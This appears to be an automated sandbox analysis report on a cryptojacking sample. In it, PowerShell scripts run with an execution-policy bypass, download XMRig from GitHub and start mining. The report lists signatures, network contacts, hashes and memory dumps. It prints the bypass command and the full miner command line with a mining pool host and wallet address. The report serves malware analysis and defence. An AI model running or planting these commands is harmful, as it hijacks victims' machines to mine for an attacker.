C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4988-2-0x00007FF8F2423000-0x00007FF8F2424000-memory.dmp
memory/4988-5-0x000001F9705C0000-0x000001F9705E2000-memory.dmp
memory/4988-8-0x00007FF8F2420000-0x00007FF8F2E0C000-memory.dmp
memory/4988-9-0x000001F970BE0000-0x000001F970C56000-memory.dmp
memory/4988-10-0x00007FF8F2420000-0x00007FF8F2E0C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v3dwu0dw.hlq.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4988-25-0x00007FF8F2420000-0x00007FF8F2E0C000-memory.dmp
memory/4988-48-0x000001F970C60000-0x000001F970C72000-memory.dmp
memory/4988-61-0x000001F970A40000-0x000001F970A4A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1576-90-0x00000220020C0000-0x00000220020E0000-memory.dmp
memory/1576-91-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/4988-92-0x00007FF8F2423000-0x00007FF8F2424000-memory.dmp
memory/4988-93-0x00007FF8F2420000-0x00007FF8F2E0C000-memory.dmp
memory/1576-94-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-95-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-96-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-97-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-98-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-99-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-100-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-101-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-102-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-103-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-104-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-105-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-106-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-107-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-108-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-109-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-110-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-111-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-112-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-113-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-114-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-115-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-116-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-117-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-118-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-119-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-120-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-121-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-122-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-123-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-124-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-125-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-126-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-127-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-128-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-129-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-130-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-131-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-132-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-133-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-134-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-135-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-136-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-137-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-138-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-139-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-140-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-141-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-142-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-143-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-144-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-145-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-146-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-147-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-148-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-149-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-150-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-151-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-152-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-153-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-154-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-155-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:40
Platform
win7-20231129-en
Max time kernel
1559s
Max time network
1563s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
Network
Files
memory/1988-4-0x000007FEF534E000-0x000007FEF534F000-memory.dmp
memory/1988-8-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-7-0x0000000001E80000-0x0000000001E88000-memory.dmp
memory/1988-6-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-5-0x000000001B640000-0x000000001B922000-memory.dmp
memory/1988-10-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-9-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-11-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-12-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:40
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1781s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3608 wrote to memory of 780 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3608 wrote to memory of 780 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| NL | 52.111.243.31:443 | tcp | |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/3608-2-0x00007FF8BC563000-0x00007FF8BC564000-memory.dmp
memory/3608-5-0x000001E07F6B0000-0x000001E07F6D2000-memory.dmp
memory/3608-6-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp
memory/3608-9-0x000001E07F860000-0x000001E07F8D6000-memory.dmp
memory/3608-10-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmbrkdz5.d2k.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3608-25-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp
memory/3608-48-0x000001E07F9E0000-0x000001E07F9F2000-memory.dmp
memory/3608-61-0x000001E07F840000-0x000001E07F84A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/780-90-0x0000029463790000-0x00000294637B0000-memory.dmp
memory/780-91-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/3608-92-0x00007FF8BC563000-0x00007FF8BC564000-memory.dmp
memory/3608-93-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp
memory/780-94-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-95-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-96-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-97-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-98-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-99-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-100-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-101-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-102-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-103-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-104-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-105-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-106-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-107-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-108-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-109-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-110-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-111-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-112-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-113-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-114-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-115-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-116-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-117-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-118-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-119-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-120-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-121-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-122-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-123-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-124-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-125-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-126-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-127-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-128-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-129-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-130-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-131-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-132-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-133-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-134-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-135-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-136-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-137-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-138-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-139-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-140-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-141-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-142-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-143-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-144-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-145-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-146-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-147-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-148-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-149-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-150-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-151-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-152-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-153-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-154-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-155-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:23
Platform
win11-20240426-en
Max time kernel
1799s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4728 wrote to memory of 4320 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4728 wrote to memory of 4320 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4728-0-0x00007FFD97883000-0x00007FFD97885000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s2tepunc.5yf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4728-9-0x000002B9CD4C0000-0x000002B9CD4E2000-memory.dmp
memory/4728-10-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/4728-11-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/4728-12-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/4728-14-0x000002B9E59B0000-0x000002B9E59C2000-memory.dmp
memory/4728-15-0x000002B9CD4F0000-0x000002B9CD4FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4320-46-0x000001A46FA50000-0x000001A46FA70000-memory.dmp
memory/4320-47-0x000001A471450000-0x000001A471470000-memory.dmp
memory/4320-48-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4728-49-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
